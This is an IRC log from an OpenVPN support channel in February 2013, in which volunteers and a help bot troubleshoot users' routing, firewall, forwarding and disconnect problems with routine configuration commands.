15:47 < EugeneKay> ....you run OpenVZ VPSes, and are wanting to know why 1.2.3.0/24 is a bad idea 15:47 < combat7331> oh <.< 15:48 < EugeneKay> I think this is the part where I stop paying attention 15:48 < combat7331> used it for ages and always worked perfectly 15:50 <@plaisthos> that it works does not mean there are no problems :) 15:50 < combat7331> true 15:51 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 15:52 < combat7331> doesn't work either with a different subnet 15:57 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:01 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:03 < combat7331> does anyone have a clue, i honestly don't :(. 16:06 <@krzee> what sort of connection does your client have to its default gateway? 16:06 < combat7331> ethernet 16:06 <@krzee> is it a laptop or a desktop? (will it be changing networks?) 16:07 < combat7331> its a VPS server running OpenVZ on a VPS node connected to a datacenter network. 16:07 <@krzee> netstat -rn 16:07 <@krzee> (pastebin) 16:08 < combat7331> http://pastebin.com/UrnXNWKF 16:09 -!- db48x2 [~db48x@50-0-51-244.dsl.static.sonic.net] has joined #openvpn 16:09 <@krzee> it default routes to a vm? 16:09 < combat7331> to eth0 interface on the node yes 16:09 < db48x2> !welcome 16:09 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 16:09 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:09 < combat7331> thats how the network work 16:09 < combat7331> on openvz 16:10 < combat7331> I'm not sure but i think it's bridged 16:10 <@krzee> maybe route-gateway will work but i dunno 16:10 < db48x2> I guess you guys get the same questions over and over :) 16:10 <@krzee> but ya, openvpn cant figure out whats up with your default route 16:10 <@krzee> db48x2, yep ;] 16:10 < db48x2> !goal 16:10 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 16:11 < combat7331> route-gateway just provide my gateway? 16:11 < combat7331> that my ISP gave me? 16:11 <@krzee> oh actually no nevermind route-gateway will not help 16:11 < db48x2> !/30 16:11 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 16:11 < combat7331> what would then :( 16:11 < db48x2> heh 16:12 <@krzee> combat7331, 16:12 <@krzee> !configs 16:12 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 16:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:13 <@krzee> combat7331, also show me this: /sbin/ip route list exact 0.0.0.0/0 16:13 < combat7331> on client or server? 16:14 <@krzee> which machine had "Sun Feb 24 23:30:31 2013 NOTE: unable to redirect default gateway -- Cannot read current default gateway from system" 16:14 < combat7331> client 16:14 <@krzee> …then the client 16:14 < combat7331> http://pastebin.com/7ftZk1iz 16:14 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:15 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 16:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:18 < db48x2> so, my goal is to be able to access the internet over my vpn, but although my client's udp traffic reaches the server, it doesn't show up on the server's tun device. here's my configuration: http://pastebin.com/8jhUYazt 16:18 < db48x2> there's nothing in the log except startup messages, although I'd be happy to paste them momentarily 16:18 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 16:19 < db48x2> oh, and this is openvpn 2.2.2 on Fedora 16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 16:20 < combat7331> I'll have to go, I guess it's not possible with OpenVZ. 16:20 -!- combat7331 [~Mamba@d54C65431.access.telenet.be] has quit [] 16:21 <@krzee> lol 16:21 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 16:21 <@krzee> db 16:21 <@krzee> err 16:21 <@krzee> db48x2, 16:21 <@krzee> !redirect 16:21 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:21 <@vpnHelper> http://ircpimps.org/redirect.png 16:22 <@krzee> once we get you connected, you'll be able to use that 16:22 <@krzee> but it sounds like you're stuck at the very top for now, cant connect to the vpn 16:22 <@krzee> !logs 16:22 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 16:22 <@krzee> (verb 5) 16:22 < db48x2> yes, I don't have the default route set in the client config, because that makes it hard to look things up :) 16:22 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Client Quit] 16:23 <@krzee> thats cool for now 16:23 < db48x2> good flowchart, yes, I'm at the very top 16:23 < db48x2> lemme show you the logs 16:23 <@krzee> lets get your vpn connected first, then we'll worry about changing the gateway 16:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:24 < db48x2> that should just be a matter of uncommenting it from the config :) 16:24 <@krzee> right 16:24 <@krzee> assuming ip forwarding is enabled and nat is configured right ;] 16:24 < db48x2> http://pastebin.com/0wUMy5sN 16:24 < db48x2> yea, it _should_ be right, but with no way to test it... :) 16:24 <@krzee> thats not verb 5 16:24 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:26 < db48x2> you're right, the server is at verb 4 right now; I was trying different verbosity levels 16:26 <@krzee> the config you posted had verb 3, you didnt change anything else right? 16:26 < db48x2> nothing else 16:27 <@krzee> k so make it verb 5 and post both sides 16:27 < db48x2> sure, one moment 16:32 < db48x2> hmm, interesting 16:33 < db48x2> db48x.net/temp/{server,client}.log 16:33 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Ping timeout: 252 seconds] 16:35 <@krzee> no W and R after that? 16:35 <@krzee> i was expecting a bunch of WWW RRRR WRWRWR stuff 16:35 < db48x2> nope 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168148] type=1400 audit(1361744958.996:54): avc: denied { read } for pid=9242 comm="openvpn" name="openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168157] type=1400 audit(1361744958.996:55): avc: denied { open } for pid=9242 comm="openvpn" path="/etc/openvpn/openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> Feb 24 14:29:18 celebdil kernel: [1073042.168210] type=1400 audit(1361744958.996:56): avc: denied { getattr } for pid=9242 comm="openvpn" path="/etc/openvpn/openvpn-key.txt" dev="sdg5" ino=4656 scontext=system_u:system_r:openvpn_t:s0 tcontext=system_u:object_r:file_t:s0 tclass=file 16:36 <@krzee> your kernel is stopping openvpn, selinux or something 16:36 < db48x2> selinux is in permissive mode, so that's just a warning 16:36 <@krzee> ahh 16:36 < db48x2> I do get openvpn[9246]: read UDPv4 [EHOSTUNREACH]: No route to host (code=113) every time ping tries to ping the server 16:36 <@krzee> show me iptables -L from both sides 16:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:39 < db48x2> oh dear, the client computer's firewall is complicated 16:39 <@krzee> !ipforward 16:39 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 16:39 <@krzee> err no 16:39 <@krzee> hrm 16:39 <@krzee> !linipforward 16:39 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 16:39 <@krzee> iptables -I FORWARD -i tun+ -j ACCEPT 16:39 <@krzee> try that 16:39 <@krzee> then reconnect 16:40 < db48x2> the udp packets are making it to the server though 16:40 <@krzee> do you understand the command i just pasted? 16:40 < db48x2> yes 16:40 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn 16:40 <@krzee> you sure? 16:41 < db48x2> it also doesn't fix it 16:41 <@krzee> which machine did you try it on? 16:41 <@krzee> also, no guartunee it will work, since you didnt paste the firewalls 16:43 <@krzee> and is your client being started as root? 16:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:43 < db48x2> http://pastebin.com/JH6NYBdC 16:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 16:44 <@krzee> and the other? 16:45 < db48x2> db48x.net/temp/client.iptables 16:45 < db48x2> but irrelevant, since udp packets from the client are arriving at the server 16:46 < rob0> fine, unless you blocked the tun interface 16:46 <@krzee> right 16:47 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 260 seconds] 16:47 <@krzee> i figured you caught that when you said you understood the command i said to enter 16:48 < db48x2> what do you mean by blocked? I'm pinging the server's vpn address from the client, and openvpn is wrapping them up and sending them to the server 16:48 < db48x2> so it can't be blocked 16:48 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 16:48 < db48x2> the command you gave me enables forwarding from any tun device, which is what I want to happen on the server, eventually 16:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 16:49 <@krzee> packets must forward to the tun device, or theres no vpn 16:49 <@krzee> ever. 16:49 < EugeneKay> openvpn is not a magical network device. The tun driver is the one built into the linux kernel. 16:49 < db48x2> I'm not going to bother having the client forward packets from my local net to the vpn 16:50 <@krzee> you're not understanding 16:50 < db48x2> only my client machine will access the vpn 16:50 < db48x2> quite possible! 16:50 < rob0> !iptables 16:50 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 16:50 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 16:50 < EugeneKay> Packets frm the tun device have to be allowed to get forwarded to eth#, and then back the other direction for responses 16:51 <@krzee> trying to follow those rules hurts my eyes 16:51 <@krzee> im guessing they are so abstracted because of some sort of web gui compatibility or something 16:52 < db48x2> my point is merely that when I ping my server's vpn address, a udp packet arrives at the server on port 1194 16:53 < db48x2> so packets are being forwarded from the client's tun device out to the network 16:53 <@krzee> oh ya? and is that ping making it all the way? 16:53 < db48x2> the server doesn't generate a reply 16:54 < db48x2> the packet counts on the server's tun device don't increase 16:54 <@krzee> does the server recieve the ping? 16:54 < EugeneKay> Are you firewalling ICMP 16:54 < db48x2> no, only the udp packets 16:54 < db48x2> all ICMP packets are accepted 16:55 <@krzee> i notice that your posted server iptables rules dont have the rule i told you to add 16:56 < db48x2> ACCEPT all -- anywhere anywhere on chain FORWARD 16:56 <@krzee> thats the command i said to enter? 16:56 < db48x2> that's what it results in 16:57 <@krzee> nuh uhhh 16:57 < db48x2> I can run it again and add another such rule to the list :) 16:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> ACCEPT all -- anywhere anywhere 16:57 < db48x2> :) 16:58 <@krzee> i guess theres some other way of seeing it where interface is in there 16:58 <@krzee> i dont reallyuse linux 16:58 <@krzee> dont really use* 16:58 < db48x2> yea, -v 16:59 < db48x2> pkts bytes target prot opt in out source destination 16:59 < db48x2> 0 0 ACCEPT all -- tun0 any anywhere anywhere 16:59 < db48x2> 0 0 ACCEPT all -- tun+ any anywhere anywhere 16:59 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:59 <@krzee> there we go 17:01 < db48x2> hahaha, I figured it out 17:01 <@krzee> what was it? 17:01 < db48x2> I never accepted udp packets on port 1194 on the INPUT chain, because I never restarted the service 17:01 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:02 <@krzee> the topic wins again! 17:02 <@krzee> "Your problem is probably firewall, Really" 17:02 < Suterusu> MYne isn't 17:02 < Suterusu> lol 17:03 <@krzee> we'll see bout that! 17:03 < Suterusu> lol 17:03 < db48x2> yea, firewalls are tricky, no doubt 17:03 <@krzee> heh 17:03 < rob0> and iptables is not actually a service, that's just how your distro presents it to you. 17:04 < db48x2> yes, yes 17:04 < Suterusu> If t'was me firewall it'd be total, and not intermittent - also, i'd be featuring 'random' d/c's from my VPN before the last few days (its been up ~70 days) 17:04 < db48x2> I forgot to twack it upside the head and reinitialize it's tables 17:04 <@krzee> Suterusu, 17:04 <@krzee> !goal 17:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 17:05 <@krzee> Suterusu, no mind-readers here ;] 17:05 < Suterusu> 'tis for tuneling me internot thru - I gets err msg in openvpn.log: Mon Feb 25 01:59:06 2013 us=362376 CBD-Orthus/81.152.141.152:37229 MULTI: bad source address from client [192.168.1.113], packet dropped -=- Pekster suggested running tcpdump on client - which I has done, muchly - Can't correlate event, tho 17:06 < rob0> hehe, internot 17:09 <@krzee> Suterusu, something running on your client is sending traffic with src ip of eth interface 17:09 <@krzee> in windows smb file sharing sometimes does that 17:10 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 17:11 < db48x2> thanks krzee, and everyone else, for your help 17:11 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:11 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:12 <@krzee> yw 17:16 < Suterusu> Did me last msg make it - or you still tryng from read minds? 17:16 <@krzee> [19:09] Suterusu, something running on your client is sending traffic with src ip of eth interface 17:16 <@krzee> [19:09] in windows smb file sharing sometimes does that 17:16 -!- db48x2 [~db48x@50-0-51-244.dsl.static.sonic.net] has quit [Ping timeout: 257 seconds] 17:16 < Suterusu> Ahh, missed tht, taa 17:16 <@krzee> np 17:17 < Suterusu> Can't spot nothing using me internal IP via tcpdump - in openvpn.log on server, however, I can see many instances of this - but they is accepted and don't result in d/c 17:17 < Suterusu> Useually towards begginin o connection 17:17 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has quit [Ping timeout: 245 seconds] 17:18 -!- folivora [~out@46.19.34.64] has quit [Ping timeout: 260 seconds] 17:19 < Suterusu> How could one set it so w/o VPN, Things can't get to the 'net? As in, when I'm d/c;d form VPN? Or, preferably, has it reconnect to the VPN automatically? 'tis set 'connect automatically' in network manager, doesn't appear to of done much 17:24 < pekster> Suterusu: the server is printing the IP it's rejecting the access from 17:24 -!- folivora [~out@46.19.34.64] has joined #openvpn 17:24 -!- ihptru [~ihptru@164.138.25.4] has joined #openvpn 17:24 < pekster> So, if you run a VPN on 10.8.0.0/24 and your eth0 IP of client is 192.168.0.7, you might get a message something like "dropping bad src from client [client1]: 192.168.0.7" 17:25 < pekster> I forget exactly how the message is formatted, but it's telling you in my example that client1 had a bad (ie: invalid, not allowed) packet source from a "bogus" address of 192.168.0.7 17:25 < pekster> Windows likes to do that a lot as a client (at my last $job we had a big issue wih windows NTP, of all things, doing that) 17:25 < pekster> It doesn't "break" anything besides the stupid client-side program that gets it's traffic dropped for doing dumb things like that 17:26 < pekster> its* 17:29 < Suterusu> Does appear t'be my IP - but tcp dump only shows the VPN IP - the disconnection appears to happen before the string of 'bad source'. by a few mins. I've accounted for time differences on the machines 17:29 -!- nsgn2 [~nsgn@cpe-24-28-31-68.austin.res.rr.com] has joined #openvpn 17:30 < nsgn2> howdy. this openvpn connect app on iphone is sick. only question i have about it is this: can i force all traffic over it? i can't seem to find a way to do this but i'd like to be able to 17:30 -!- db48x2 [~db48x@ec2-50-17-137-230.compute-1.amazonaws.com] has joined #openvpn 17:30 < db48x2> success! 17:30 < db48x2> thanks again 17:31 < pekster> nsgn2, you probably want to redirect traffic using the default gateway: 17:31 -!- db48x2 [~db48x@ec2-50-17-137-230.compute-1.amazonaws.com] has left #openvpn [] 17:31 < pekster> !redirect 17:31 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:31 <@vpnHelper> http://ircpimps.org/redirect.png 17:32 < nsgn2> !def1 17:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 17:32 < nsgn2> ah. seems fairly straight forward 17:33 < nsgn2> thanks 17:33 <@krzee> Suterusu, right its not a fatal error, only those packets going over the vpn with src ip of eth interface are being dropped, everything else has src address of vpn ip and it works fine 17:33 -!- matsh_ [divine@nanogene.org] has joined #openvpn 17:33 <@krzee> Suterusu, odds are that error has nothing to do with your disconnects 17:33 -!- oc80z [oc80z@blea.ch] has quit [Excess Flood] 17:34 <@krzee> and those errors are from some app on your system using the wrong src ip 17:34 -!- oc80z [oc80z@blea.ch] has joined #openvpn 17:34 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 17:34 -!- matsh_ is now known as matsh 17:37 < Suterusu> Its not 'some app' as I get disconnected 17:37 < Suterusu> This wasn't happening, say a week ago 17:37 < Suterusu> or even four days 17:38 < Suterusu> If it was something local, then tcpdump should has it? somewhere near the d/c ? 17:41 < pekster> You do not get that message on the server unless it *received* a packet with a bad source. You can't recive a packet unless it was sent 17:41 < Suterusu> netstat picks tht port no as being used by openvpn, But other than that, I can't place that connection 17:41 < pekster> huh? 17:41 < pekster> No, on the tap0 adapter 17:41 < pekster> the VPN peer has no clue what you're doing on the ethernet interface of the client. Only the tun/tap device 17:41 < Suterusu> Thats what I'm running tcpdump on, yeah 17:46 < Suterusu> http://pastebin.com/ZbY4ht2U Note, two mins difference (Actually two hrs n four mins, but server is two hrs two mins faster) 17:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Quit: Leaving.] 17:46 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:47 < pekster> FYI, tcpdump -n is preferred as it doesn't hide port numbers behind silly names 17:47 < Suterusu> Sure I did -npi 17:49 < Suterusu> I seem to git d/c'd every ten-twenty mins, There's nothing 'new' running on here, and I can't spot a commonality concerning d/c's, locally 17:51 < pekster> That warning in the log is curious too if that's your peer's remote IP 17:52 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 17:52 < Suterusu> eh? 17:52 < pekster> The packet length can never be larger than the link can handle, and a length of "17231" wouldn't ever make sense unless you have jumboframe support 17:52 < pekster> Line 2 17:52 < pekster> "WARNING: Bad encapsulated packet length from peer" 17:52 < Suterusu> That IP is nothing t'do with me, I think its a IRC I'm connected to 17:52 < pekster> Oh, must be an interesting port that gets scanned then 17:53 < nsgn2> heck yes. it works. time warner streaming tv over openvpn on an unjailbroken, unmodified iphone 17:55 < pekster> Suterusu: Are you sure about the time difference in your client/server? ie: 'date' shows them off by just 2 minute (not counting the hours here) 17:55 < pekster> I ask because those logs appear closer to ~7m out of sync 17:55 < pekster> So, the events may not be as related as you think (which is what I'm telling you from an operational pserspective too) 17:57 < pekster> Also, remember you'll exclude the traffic you care about if you use a filter like 'host 10.8.0.6' too 17:57 <@krzee> Suterusu, 17:57 <@krzee> !configs 17:57 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 17:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Quit: Leaving.] 17:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 17:59 < Suterusu> Remote time: Mon Feb 25 03:00:04 MSK 2013 17:59 < Suterusu> Local time: Sun 24 Feb 23:58:02 GMT 2013 17:59 < Suterusu> Quite sure 18:05 < pekster> Then those logs are not at all related 18:06 < pekster> tcpdump vs bad packet source 18:06 < pekster> They're out of sync (after accouting for your difference) by at least several minutes 18:06 < Suterusu> Iunno, its what it spits into me terminal 18:09 < Suterusu> So.. I should be looking, say, seven mins earlier in the tcpdump? 18:09 < pekster> Later 18:09 < pekster> ~02:13 !~ ~23:08 18:09 < pekster> 5m difference 18:10 < pekster> I don't even think that's your ultimate problem 18:10 < pekster> Configs, as krzee suggested, will help explain your setup better 18:10 < pekster> There's a reason for the disconnect in the logs, which I still haven't seen 18:10 < pekster> You care about why it disconnected, not the time/IP of a badly source packet 18:11 <@krzee> the bad source stuff is likely a red herring 18:12 < Suterusu> I was hoping the time of the packet would help deduce what/why d/c 18:12 < Suterusu> and there isn't a 'later' - The adapter is d/c by that point 18:13 < pekster> server+client configs+logs are vastly more useful 18:14 < pekster> Knowing what sends that bad packet only fixes that problem, not why you're disconnected 18:15 <@krzee> exactly 18:16 -!- max_ [~max@98.225.19.83] has quit [Read error: Connection reset by peer] 18:19 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer] 18:31 < Suterusu> OpenVPN log: http://pastebin.com/hCikgsey 18:31 < Suterusu> OpenVPN server conf: http://pastebin.com/7iKNP0uN 18:31 < Suterusu> Iunno from local config, aint fouind that, I jus use KDE's network manager. any local logs of interest? 18:37 -!- nsgn2 [~nsgn@cpe-24-28-31-68.austin.res.rr.com] has quit [Quit: Leaving] 18:45 -!- JSharpe [~JSharpe@37.220.15.234] has quit [Quit: Leaving] 18:57 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 18:57 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:00 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has quit [Quit: mikeybs] 19:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 19:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:20 <@ecrist> we don't recomment network manager around here 19:20 <@ecrist> we need local client config to help 19:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 19:37 -!- p3rror [~mezgani@41.249.131.248] has quit [Ping timeout: 260 seconds] 19:45 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 19:53 < pekster> Suterusu: The TCP socket is being reset, causing the disconnect. This is completely independent of the bad source address message. See f.eg, line 51 in the first paste 19:54 < pekster> The client logs would possibly tell you why, but the server is shutting down a connection when the TCP stack tells it the host no longer wishes to communicate any further 20:00 -!- nickmoeck [~nickmoeck@205.185.118.253] has quit [Quit: leaving] 20:13 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 20:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 20:29 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 20:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:38 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 20:42 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 20:51 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has joined #openvpn 20:54 -!- mikeybs [~michael@cpe-67-248-128-94.nycap.res.rr.com] has left #openvpn [] 21:18 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 21:23 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Remote host closed the connection] 21:23 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 21:28 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-fzgpavylrsfwposr] has quit [Read error: Operation timed out] 21:28 -!- b00gz_ [~uid6869@gateway/web/irccloud.com/x-kkrfkdubixvsunqu] has joined #openvpn 21:29 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 264 seconds] 21:29 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 21:33 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:48 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has quit [Ping timeout: 248 seconds] 22:19 -!- odoacre [~antonio@us.happylatte.com] has quit [Ping timeout: 255 seconds] 22:19 -!- odoacre [~antonio@us.happylatte.com] has joined #openvpn 22:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:21 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 22:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:21 -!- mode/#openvpn [+o krzee] by ChanServ 22:27 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 22:27 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 22:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 22:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 22:48 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 23:04 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] --- Day changed Mon Feb 25 2013 00:36 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 00:38 -!- corretico [~luis@190.211.93.38] has joined #openvpn 01:16 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 01:37 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 01:49 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 02:18 -!- sejo [~SeJo@fosdem/staff/sejo] has joined #openvpn 02:19 < sejo> hey all I have a openvpn tunnel (udp 2 directions) between 2 servers, when trying to add a third server the tunnels fail 02:19 < sejo> is there a guide somewhere on how to do it? 02:29 -!- thinkHell [~Hell@85.15.47.27] has quit [Quit: ["pop()"]] 02:42 < matsh> Why does it fail? 02:45 <@krzee> are you using static keys? 02:46 <@krzee> or maybe re-using certs for the 2 clients? 02:46 <@krzee> ^ sejo 02:54 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 02:57 < sejo> I use stared key 02:57 < sejo> one for both clients 02:57 < sejo> is that incorrect 02:58 < sejo> do i need a new shared key per client? 02:59 < sejo> this is the config that works with only 1 02:59 < sejo> http://dpaste.com/992567/ 03:00 < sejo> I copied that for the second server and now none of the two (old and new) won't connect 03:00 < sejo> do I need a new tun and a new shared key? 03:06 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 03:07 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:54 -!- dazo_afk is now known as dazo 03:55 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 04:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:13 -!- zz_AsadH is now known as AsadH 04:28 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit 